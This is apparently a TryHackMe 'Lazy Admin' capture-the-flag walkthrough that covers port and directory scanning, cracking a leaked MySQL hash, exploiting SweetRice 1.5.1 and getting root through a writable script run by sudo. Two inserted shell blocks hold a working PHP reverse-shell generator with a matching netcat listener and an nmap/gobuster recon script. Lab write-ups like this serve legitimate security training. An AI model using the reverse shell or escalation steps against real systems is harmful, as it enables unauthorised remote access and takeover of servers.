TryHackMe — Lazy Admin

Easy Linux machine to practice your skills

Link to Room: https://tryhackme.com/room/lazyadmin

I started with an nmap scan and found both SSH and a web server:

I went to the web server in my browser and found a default Apache landing page:

I scanned for some common directories using gobuster and got the following hits:
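To make the enumeration phase above repeatable, here is a small shell helper. It is an added example, not the commands from the original write-up: it runs a fast full-port nmap sweep in grepable output mode, parses out the open ports so the slower version/script scan only touches those, and runs gobuster against any port nmap names http or https. The TARGET environment variable, the wordlist path and the embedded sample nmap line are all assumptions (the sample is constructed so the parser can be exercised offline).

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): two-phase nmap sweep plus
# gobuster, driven by a parser for nmap's grepable (-oG) output.
# Assumptions: nmap and gobuster are installed; WORDLIST points at a real list.
set -u

WORDLIST="${WORDLIST:-/usr/share/wordlists/dirb/common.txt}"   # assumed path

# Constructed sample of what "nmap -oG -" prints for one host (tab-separated fields).
SAMPLE_GREPABLE=$(printf 'Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH/, 443/filtered/tcp//https///, 80/open/tcp//http//Apache httpd/\tIgnored State: closed (997)')

# Read nmap -oG output on stdin and print the open ports as "22,80".
# Each "Ports:" entry looks like port/state/proto//service//version/ .
open_ports_from_grepable() {
  awk -F'Ports: ' '
    /Ports: / {
      n = split($2, entries, ", ")
      for (i = 1; i <= n; i++) {
        split(entries[i], f, "/")            # f[1]=port f[2]=state f[3]=proto f[5]=service
        if (f[2] == "open") printf "%s%s", (seen++ ? "," : ""), f[1]
      }
    }
    END { if (seen) print "" }'
}

# Same input, but one port per line and only where the service name is http/https,
# which is what a plain port sweep (no -sV) reports from nmap-services.
http_ports_from_grepable() {
  awk -F'Ports: ' '
    /Ports: / {
      n = split($2, entries, ", ")
      for (i = 1; i <= n; i++) {
        split(entries[i], f, "/")
        if (f[2] == "open" && f[5] ~ /^https?$/) print f[1]
      }
    }'
}

# Fast sweep of all ports, then scripts/version detection only on the open ones,
# then a directory brute-force on every web port found.
recon() {
  local target="$1" grepable ports http_port
  grepable=$(nmap -p- -T4 --min-rate 1000 -oG - "$target")
  ports=$(printf '%s\n' "$grepable" | open_ports_from_grepable)
  [ -n "$ports" ] || { echo "no open ports on $target" >&2; return 1; }
  nmap -sV -sC -p "$ports" "$target"
  printf '%s\n' "$grepable" | http_ports_from_grepable | while read -r http_port; do
    gobuster dir -u "http://$target:$http_port/" -w "$WORDLIST" -x php,txt
  done
}

if [ -n "${TARGET:-}" ]; then
  recon "$TARGET"
else
  printf 'open ports in constructed sample: %s\n' "$(printf '%s\n' "$SAMPLE_GREPABLE" | open_ports_from_grepable)"
fi
```

Run it as `TARGET=10.10.x.x bash recon.sh` against your assigned machine; without TARGET it only parses the constructed sample. One caveat: the "," split assumes nmap version strings contain no ", ", which holds for the banners here but is worth checking if a port goes missing.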

At /content I got this message:

I’ve never heard of SweetRice before, so I tried to read up a little about it, HERE.

I expanded the directory search under /content and found a few more:

At /as, I got this:

At /inc I found a bunch of files:

I think I found the version number here:

The other interesting file here was the “mysql_backup” file, which seemed to contain two users, admin and manager, and a password hash for manager:

I quickly threw it into an online password cracker and, hilariously, the password is “Password123”, which is funny because I had tried that exact password for the admin user at the login page earlier.

And we’re in:

I switched the website on to see what would happen, and this was all it showed:

Now that I have the version number, I can look for exploits. I initially searched Metasploit, but it had nothing:

But I was able to find a bunch online and in searchsploit:

Looks like quite a few for version 1.5.1 in searchsploit. I chose the XSRF and PHP Execution one and downloaded it for more info.

According to this, I need to go to the Adding Ads section and submit this, which lets me place PHP code on the server.

I used the script provided but made some changes, highlighted here:

The URL will be specific to your instance: it uses the machine IP TryHackMe assigned you.

Then replace the PHP code with a reverse shell. I opted for the tried-and-true PHP reverse shell from Pentest Monkey, found HERE.

You will replace the highlighted parts here:

I changed the PHP script, adding my AttackBox IP and the port I would listen on.

Then I set up a listener.

After you press DONE, you should see it here:

Then browse to this directory to execute it:

After you click on it, head back to your listener, where a shell should now have spawned:
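The steps above come down to two values that must match: the attacker IP and port in the PHP file, and the port the listener is bound to. The helper below makes that explicit. It is an added example and not the Pentest Monkey script the write-up uses: it generates a much shorter PHP reverse shell (fsockopen for the connection, proc_open to wire a shell's stdin/stdout/stderr to the socket) and starts the matching netcat listener. The IP 10.10.1.2 and port 4444 are assumptions; substitute your AttackBox values.

```shell
#!/usr/bin/env bash
# Added example (not the write-up's Pentest Monkey script): a minimal PHP
# reverse shell generator plus the matching listener, so the two values you
# must edit (attacker IP and port) are explicit. IP/port defaults are assumed.
set -u

# Emit a short PHP reverse shell that connects back to $1:$2.
# fsockopen opens the TCP connection; proc_open runs /bin/sh with fds 0/1/2
# bound to that socket; proc_close blocks until the shell exits, which keeps
# the HTTP request (and so the shell) alive.
php_reverse_shell() {
  local ip="$1" port="$2"
  case "$port" in ''|*[!0-9]*) echo "port must be numeric" >&2; return 1;; esac
  cat <<EOF
<?php
\$sock = fsockopen("$ip", $port);
if (!\$sock) { exit("connect to $ip:$port failed"); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
proc_close(\$proc);
EOF
}

# Start the catcher. Run this BEFORE triggering the PHP file; otherwise the
# connect-back fails and all you see in the browser is "connect ... failed".
start_listener() {
  nc -lvnp "$1"   # -l listen, -v verbose, -n no DNS, -p port
}

# Write the payload to a file ready to paste into the exploit's PHP field.
write_payload() {   # usage: write_payload 10.10.1.2 4444 shell.php
  php_reverse_shell "$1" "$2" > "$3" && printf 'wrote %s\n' "$3"
}

# Stand-alone run: print the payload for the assumed (or exported) IP and port.
php_reverse_shell "${ATTACKER_IP:-10.10.1.2}" "${ATTACKER_PORT:-4444}"
```

Usage is `start_listener 4444` in one terminal and `write_payload <AttackBox IP> 4444 shell.php` in another, then paste shell.php's contents where the exploit expects the PHP code. Because the payload runs as the web server user, expect the shell to come back as www-data, exactly as the write-up observes next.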

Remember that you can create a better shell by using the following:

Right now it seems I’m logged in as www-data. Time to look around.

I finally found the first flag by navigating to the “itguy” user’s home directory:

mysql_login.txt gives a username (rice) and password (randompass). Not sure if that will be useful yet.

Right now my goal is to escalate privileges. Currently, I have the following sudo permissions:

This says that I can run backup.pl through sudo with no password required.

Looking at that file, I see that it executes something called “/etc/copy.sh”:

I went to check /etc/copy.sh and saw this, which looks like another reverse shell.

I then checked whether I was able to write to it, in order to change it for my own devious purposes, and I could.

So I’m going to change it to give me a shell. I’ll keep it very simple and overwrite the whole file with a single line: /bin/bash

Since I know backup.pl runs with sudo and no password, as seen earlier, running it should now execute my edited copy.sh as root and drop me into a root shell.

Looks like it worked! After this it was easy to navigate to the root flag:

I never did anything with those mysql logins I found. If anyone figured out what those were for, let me know.
